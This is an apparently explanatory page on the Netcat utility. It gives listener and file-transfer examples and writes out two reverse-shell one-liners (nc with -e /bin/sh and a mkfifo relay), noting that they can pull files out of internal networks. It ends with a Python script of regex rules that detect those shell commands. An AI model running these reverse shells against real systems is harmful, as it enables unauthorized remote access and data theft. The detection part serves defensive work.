What is NetCat
- According to its manual:
Netcat is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol. It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities. Netcat, or "nc" as the original program was named, should have been supplied long ago as another one of those cryptic but standard Unix tools.
From a hacker's perspective, NetCat is known as a very handy tool when it comes to implementing a system shell or testing connectivity.
Plus, NetCat can be used as a file transfer tool or a cross-machine clipboard.
If you open a port `4444` on one machine, say `192.168.1.123`, and want to put file
nc -nlvp 4444
cat test.txt | nc -nv 192.168.1.123 4444
You can easily pull a file out of an internal network using this method, through a reverse shell.
`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <host> <port> >/tmp/f` can be used when the NetCat on the target system doesn't support:
nc -nv <host> <port> -e /bin/sh
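
Both shell-spawning forms above leave a recognisable process command line. The following is an added example, not part of the original page, that flags them in command-line telemetry; the rule names, the `classify`/`scan` helpers and the sample lines (using the documentation address 192.0.2.10) are constructed for illustration.

```python
import re

# Netcat binary names, optionally path-qualified, at the start of a command.
NC = r"(?:^|[\s;|&])(?:\S*/)?(?:nc|ncat|netcat)\b"
# Common shells, optionally path-qualified.
SHELL = r"(?:\S*/)?(?:ba|da|z|k)?sh\b"

RULES = {
    # nc <host> <port> -e /bin/sh : netcat itself executes the shell.
    "nc_exec_shell": re.compile(NC + r"[^|;&]*\s-[A-Za-z]*e\s+" + SHELL),
    # mkfifo F; cat F | sh -i 2>&1 | nc <host> <port> > F :
    # the FIFO relay used when the local netcat has no -e option.
    "fifo_shell_relay": re.compile(
        r"\bmkfifo\s+(\S+?)\s*;.*\|\s*" + SHELL + r"[^|]*\|\s*"
        r"(?:\S*/)?(?:nc|ncat|netcat)\b[^|;&]*>\s*\1(?!\S)"
    ),
}


def classify(cmdline):
    """Return the names of the rules a process command line matches."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def scan(cmdlines):
    """Map each flagged command line to the rules it matched."""
    return {c: hits for c in cmdlines if (hits := classify(c))}


# Constructed sample command lines (not captured from a real system).
SAMPLES = [
    "nc -nlvp 4444",                           # plain listener
    "cat test.txt | nc -nv 192.0.2.10 4444",   # file transfer, no shell
    "nc -nv 192.0.2.10 4444 -e /bin/sh",
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.0.2.10 4444 >/tmp/f",
    "/usr/bin/ncat -lvnp 4444 -e /bin/bash",
    "rsync -e ssh src dst",                    # benign -e on another tool
]

if __name__ == "__main__":
    for cmd, hits in scan(SAMPLES).items():
        print(f"{','.join(hits):18} {cmd}")
```

The rules match command-line text only, so they work best alongside network telemetry for unexpected outbound connections from hosts that run a shell.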